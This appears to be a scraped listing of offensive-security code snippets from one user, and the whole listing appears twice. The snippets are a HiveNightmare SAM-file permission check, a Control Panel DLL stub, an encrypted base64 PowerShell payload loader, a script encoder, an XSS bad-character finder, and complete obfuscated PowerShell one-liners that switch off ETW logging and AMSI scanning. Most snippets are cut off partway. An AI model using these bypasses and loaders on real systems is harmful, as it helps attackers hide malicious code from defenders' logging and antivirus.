reigningshells

## Invoke-HiveNightmare.ps1
function Invoke-HiveNightmare
{
	if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access | where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "*Read*")}).Count -gt 0)
	{
		Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam"
	}
	else
	{
		Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies"
	}

## Cplapplet.cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>

extern "C" __declspec(dllexport) LONG CplApplet()
{
	MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
	return 1;
}

## HH2020-tag-generator-pseudo-shell.py
#!/usr/bin/env python3

import sys
import argparse
import string
import random
import requests
import urllib3
import base64
import readline

## cert-transparency-extractor.py
#!/usr/bin/env python3

import sys
import argparse
import requests
from lxml import html
import urllib3

# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

## cryptedkerb.ps1
function Expand-Script($Key)
{

	$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk

## script-encoder.ps1
Function Encode-Script
{
	Param(
		[Parameter(Position = 0, Mandatory = $True)]
		[String]
		$Data,

		[Parameter(Position = 1, Mandatory = $True)]
		[String]
		$Key

## powershell-bypasses.ps1
# Logging bypass:

(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

# AMSI Bypass (old, burned)

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# New AMSI bypass obfuscation:

## badchars.py
#!/usr/bin/env python

"""

Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string

[CR] = Carriage Return or \r
[LF] = Line Feed or \n
	function Invoke-HiveNightmare
	{
	if(((Get-Acl -LiteralPath C:\Windows\System32\config\sam).Access \| where{($_.IdentityReference -eq "BUILTIN\Users") -and ($_.FileSystemRights -like "Read")}).Count -gt 0)
	{
	Write-Output "[*] VULNERABLE - BUILTIN\Users have Read access on C:\Windows\System32\config\sam"
	}
	else
	{
	Write-Output "[!] BUILTIN\Users do not have Read access on C:\Windows\System32\config\sam but may on volume shadow copies"
	}
	// dllmain.cpp : Defines the entry point for the DLL application.
	#include "pch.h"
	#include <Windows.h>

	extern "C" __declspec(dllexport) LONG CplApplet()
	{
	MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
	return 1;
	}
	#!/usr/bin/env python3

	import sys
	import argparse
	import string
	import random
	import requests
	import urllib3
	import base64
	import readline
	function Expand-Script($Key)
	{

	$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk
	Function Encode-Script
	{
	Param(
	[Parameter(Position = 0, Mandatory = $True)]
	[String]
	$Data,

	[Parameter(Position = 1, Mandatory = $True)]
	[String]
	$Key
	# Logging bypass:

	(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

	# AMSI Bypass (old, burned)

	sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

	# New AMSI bypass obfuscation:
	#!/usr/bin/env python

	"""

	Very simple script to automate the discovery of
	bad characters in XSS filters that replace
	the entire user input string with an empty string

	[CR] = Carriage Return or \r
	[LF] = Line Feed or \n